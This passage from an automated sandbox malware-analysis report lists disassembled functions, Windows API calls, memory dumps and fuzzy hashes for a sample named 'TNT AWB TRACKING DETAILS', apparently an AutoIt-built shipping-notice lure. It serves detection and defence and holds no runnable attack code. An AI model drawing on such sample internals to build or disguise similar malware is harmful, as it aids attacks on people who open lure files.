                                                      • Part of subcall function 00EE3358: _doexit.LIBCMT ref: 00EE3362
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: ba6f0400f1a82f78be6ca0f1c31547710b6ba86da5dc5fbc871daed16472584c
                                                    • Instruction ID: 1817883b2bd0284335baec359fa0c453ca0b385a2d336e2ab50472f96ff2322b
                                                    • Opcode Fuzzy Hash: ba6f0400f1a82f78be6ca0f1c31547710b6ba86da5dc5fbc871daed16472584c
                                                    • Instruction Fuzzy Hash: C6D05B323C435C36D11532B57D0BFDA76C84F15B52F045426FF0C695E389D295C161E6
                                                    Function 00F01935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 00F01775
                                                      • Part of subcall function 00F3BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00F0195E,?), ref: 00F3BFFE
                                                      • Part of subcall function 00F3BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F3C010
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F0196D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 582185067-3257408948
                                                    • Opcode ID: f93f2b86cdca5f8a01e329626632b8f548a996bca0e23c76fbf08df798cd6ba5
                                                    • Instruction ID: 15f978455347da51225496d4dbc8f8b9240b7e9f2204a1ab350b9ce33ecb7382
                                                    • Opcode Fuzzy Hash: f93f2b86cdca5f8a01e329626632b8f548a996bca0e23c76fbf08df798cd6ba5
                                                    • Instruction Fuzzy Hash: D3F0327180000CDFCB25DBA0CA88BECBBF8BB18315F640095E506A21A0C7318F89FF60
                                                    Function 00F45998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F459AE
                                                    • PostMessageW.USER32(00000000), ref: 00F459B5
                                                      • Part of subcall function 00F25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 220f6a033dd415f6b607a3b056be367a51fe61b5757bc5d6767accfcbb093a96
                                                    • Instruction ID: e8919e3654ad300d7ef3aef1b4a5838711b2b92cebf82d9d51afb3ce58470d79
                                                    • Opcode Fuzzy Hash: 220f6a033dd415f6b607a3b056be367a51fe61b5757bc5d6767accfcbb093a96
                                                    • Instruction Fuzzy Hash: 55D0C9357C0315BBE664AB70AC0FF967A14AB15B50F050825B64AAA1D0D9E4A804D655
                                                    Function 00F45964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F4596E
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F45981
                                                      • Part of subcall function 00F25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 6fdb4159e61e7a6da417bd282fdbeb00a145ae4c270771dfa027464d29ed3d06
                                                    • Instruction ID: a992d8d16b0b5de5a45e715719dbcd8f1070467c2799f83c709f0f811649f121
                                                    • Opcode Fuzzy Hash: 6fdb4159e61e7a6da417bd282fdbeb00a145ae4c270771dfa027464d29ed3d06
                                                    • Instruction Fuzzy Hash: D8D0C935784315B7E664AB70AC0FF967A14AB11B50F050825B64EAA1D0D9E49804D654